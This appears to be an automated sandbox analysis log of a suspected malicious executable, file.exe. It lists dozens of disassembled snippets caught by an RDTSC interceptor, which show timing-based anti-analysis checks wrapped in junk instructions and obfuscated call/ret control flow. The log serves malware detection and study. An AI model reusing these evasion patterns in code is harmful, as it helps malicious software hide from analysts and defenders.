Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11DEB45 second address: 11DEB66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9668C559E3h 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F9668C559D6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DEB66 second address: 11DEB6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DF3F7 second address: 11DF438 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9668C559D6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9668C559E7h 0x00000016 jmp 00007F9668C559E9h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DF438 second address: 11DF442 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9668BCCCC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DF6C4 second address: 11DF6C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DF6C8 second address: 11DF6D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DF6D0 second address: 11DF6F1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007F9668C559D6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F9668C559D6h 0x00000012 jmp 00007F9668C559DFh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DF6F1 second address: 11DF6F7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DFADB second address: 11DFAE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DFAE4 second address: 11DFAEE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9668BCCCDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E3650 second address: 11E3671 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F9668C559E4h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E3671 second address: 11E3675 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E24CD second address: 11E24DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668C559DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E24DE second address: 11E24E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F9668BCCCC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E24E8 second address: 11E24FF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9668C559D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F9668C559D6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E24FF second address: 11E2505 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB65F second address: 11EB685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F9668C559DCh 0x0000000b jns 00007F9668C559D6h 0x00000011 jmp 00007F9668C559DDh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EAC74 second address: 11EAC79 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EAC79 second address: 11EAC90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9668C559DBh 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EAC90 second address: 11EAC94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EAFBE second address: 11EAFC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EAFC2 second address: 11EAFD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007F9668BCCCC6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB289 second address: 11EB28E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED3E6 second address: 11ED3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED3EB second address: 11ED3F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED3F2 second address: 11ED402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED5B2 second address: 11ED5B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED5B8 second address: 11ED5BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED5BC second address: 11ED5C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED96E second address: 11ED974 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED974 second address: 11ED978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDE47 second address: 11EDE62 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9668BCCCCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F9668BCCCC8h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDE62 second address: 11EDEA3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9668C559D8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebx 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F9668C559D8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov edi, ecx 0x00000029 push eax 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F9668C559DFh 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDF4F second address: 11EDF61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668BCCCCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDF61 second address: 11EDF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE160 second address: 11EE164 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE80A second address: 11EE80E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EF2EB second address: 11EF314 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9668BCCCCCh 0x00000008 je 00007F9668BCCCC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push edx 0x00000013 jmp 00007F9668BCCCD1h 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F022E second address: 11F0232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0232 second address: 11F0238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0238 second address: 11F025B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668C559E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F186E second address: 11F188A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F9668BCCCD6h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0B91 second address: 11F0B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F2DB3 second address: 11F2DBD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9668BCCCC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F2DBD second address: 11F2DC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F2DC3 second address: 11F2DC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F373C second address: 11F3741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3741 second address: 11F37A2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d mov esi, dword ptr [ebp+122D28BBh] 0x00000013 mov dword ptr [ebp+1246FB1Fh], edx 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007F9668BCCCC8h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 0000001Bh 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 mov esi, 18D37B59h 0x0000003a xchg eax, ebx 0x0000003b pushad 0x0000003c pushad 0x0000003d jmp 00007F9668BCCCD4h 0x00000042 push edi 0x00000043 pop edi 0x00000044 popad 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F37A2 second address: 11F37A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F790A second address: 11F7962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b mov bx, 31DFh 0x0000000f push eax 0x00000010 push edx 0x00000011 movzx edi, si 0x00000014 pop ebx 0x00000015 pop edi 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F9668BCCCC8h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 mov ebx, eax 0x00000034 xchg eax, esi 0x00000035 pushad 0x00000036 jmp 00007F9668BCCCD7h 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e pop eax 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3501 second address: 11F3505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3FDF second address: 11F3FE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F7962 second address: 11F7966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3FE5 second address: 11F3FEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F8909 second address: 11F890F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA895 second address: 11FA8D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov bx, si 0x0000000c push 00000000h 0x0000000e mov dword ptr [ebp+1247BCC8h], edx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F9668BCCCC8h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 xchg eax, esi 0x00000031 push eax 0x00000032 push edx 0x00000033 jng 00007F9668BCCCC8h 0x00000039 push ecx 0x0000003a pop ecx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA8D2 second address: 11FA8D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FB8E6 second address: 11FB962 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9668BCCCC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c jmp 00007F9668BCCCCFh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F9668BCCCC8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F9668BCCCC8h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 0000001Ah 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 sub di, 755Bh 0x0000004d sub dword ptr [ebp+1247E199h], edx 0x00000053 xor edi, dword ptr [ebp+122D3744h] 0x00000059 push 00000000h 0x0000005b mov di, 6E4Ch 0x0000005f xchg eax, esi 0x00000060 push esi 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FB962 second address: 11FB968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FCA9D second address: 11FCAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F9668BCCCC6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FDA24 second address: 11FDA29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12016A9 second address: 1201727 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 jmp 00007F9668BCCCD5h 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F9668BCCCC8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007F9668BCCCC8h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 00000014h 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 sub dword ptr [ebp+122D29B7h], eax 0x0000004b push 00000000h 0x0000004d sub ebx, dword ptr [ebp+122D3750h] 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F9668BCCCD1h 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1201727 second address: 1201731 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F9668C559D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1201731 second address: 1201735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120072F second address: 1200735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120185E second address: 1201867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1202836 second address: 120283C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200735 second address: 120073A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1203632 second address: 12036D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jne 00007F9668C559D6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F9668C559D8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+122D1DD2h] 0x00000031 push 00000000h 0x00000033 mov bx, 4203h 0x00000037 jmp 00007F9668C559E5h 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push esi 0x00000041 call 00007F9668C559D8h 0x00000046 pop esi 0x00000047 mov dword ptr [esp+04h], esi 0x0000004b add dword ptr [esp+04h], 00000014h 0x00000053 inc esi 0x00000054 push esi 0x00000055 ret 0x00000056 pop esi 0x00000057 ret 0x00000058 jmp 00007F9668C559E5h 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F9668C559E5h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1201867 second address: 120186B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120073A second address: 1200740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12036D0 second address: 12036DA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9668BCCCC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200740 second address: 1200744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12028CB second address: 12028D1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200744 second address: 1200748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12028D1 second address: 12028EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9668BCCCD5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1204683 second address: 1204688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1203901 second address: 1203913 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668BCCCCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1204688 second address: 120468E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1203913 second address: 1203918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120468E second address: 120469B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1203918 second address: 120391E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120469B second address: 12046E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop ebx 0x00000008 nop 0x00000009 sub edi, dword ptr [ebp+122D3808h] 0x0000000f push 00000000h 0x00000011 mov di, dx 0x00000014 and ebx, dword ptr [ebp+122D18D9h] 0x0000001a push 00000000h 0x0000001c mov ebx, 3D3BA420h 0x00000021 xchg eax, esi 0x00000022 jp 00007F9668C559DCh 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jg 00007F9668C559EDh 0x00000031 jmp 00007F9668C559E7h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1205766 second address: 120576B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1206889 second address: 1206899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F9668C559D6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12058AB second address: 12058B0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1243BA2 second address: 1243BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
